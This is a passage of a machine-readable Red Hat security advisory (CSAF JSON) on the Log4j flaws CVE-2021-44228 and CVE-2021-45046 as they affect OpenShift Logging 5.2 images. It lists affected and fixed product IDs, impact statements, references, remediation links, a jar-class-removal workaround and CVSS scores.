"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:38:45+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
